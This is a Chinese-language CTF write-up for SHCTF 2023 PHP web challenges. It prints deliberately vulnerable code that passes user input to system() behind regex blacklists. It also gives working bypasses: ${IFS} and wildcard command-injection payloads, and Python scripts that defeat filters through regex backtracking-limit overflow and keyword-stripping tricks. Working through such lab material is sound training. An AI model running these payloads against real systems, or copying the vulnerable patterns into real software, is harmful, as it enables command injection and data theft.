1.ez_rce
1 2 3 4 5 6 7 8 9 10 11 12 13
| <?php
$rce = $_GET['rce']; if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; } } else { highlight_file(__FILE__); }
|
1 2 3 4 5 6 7 8 9 10 11
| ?rce=ls ?rce=cp${IFS}fla?.php${IFS}a.txt
<?php $flag = getenv('GZCTF_FLAG'); if($flag=="not_flag" or $flag==""){ $flag="dzctf{test_flag}"; }
?rce=ls${IFS}/ ?rce=cp${IFS}/fla?${IFS}a.php
|
2.ez_php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| <?php error_reporting(0); highlight_file('./index.txt'); if(isset($_POST['c_ode']) && isset($_GET['num'])) { $code = (String)$_POST['c_ode']; $num=$_GET['num']; if(preg_match("/[0-9]/", $num)) { die("no number!"); } elseif(intval($num)) { if(preg_match('/.+?SHCTF/is', $code)) { die('no touch!'); } if(stripos($code,'2023SHCTF') === FALSE) { die('what do you want'); } echo $flag; } }
|
PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval绕过-CSDN
回溯法绕过正则匹配
1 2 3 4 5 6 7
| import requests url="http://112.6.51.212:31842/?num[]=1" data={ 'c[ode':'a'*1000000+'2023SHCTF' } r=requests.post(url,data=data) print(r.text)
|
本题与下面一道题进行对比:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| <?php
$as=$_POST['as']; $code = $_POST['code'];
function process($code){ return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code); }
if(!is_array($as)){
if(!preg_match_all('/but.*how/is',$as)){
if(strpos($as,'but how')!==false){ system(process($code)); }else{ die('tip: backup file there'); }
}else{ die('NO there'); } } ?>
|
1 2 3 4 5 6 7 8
| import requests url="" data={ 'as':'but how'+'a'*1000000, 'code':'sort /flflagag' } r=requests.post(url,data=data) print(r.text)
|
正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数。
[PHP] strpos stripos strrpos strripos的区别-CSDN博客
123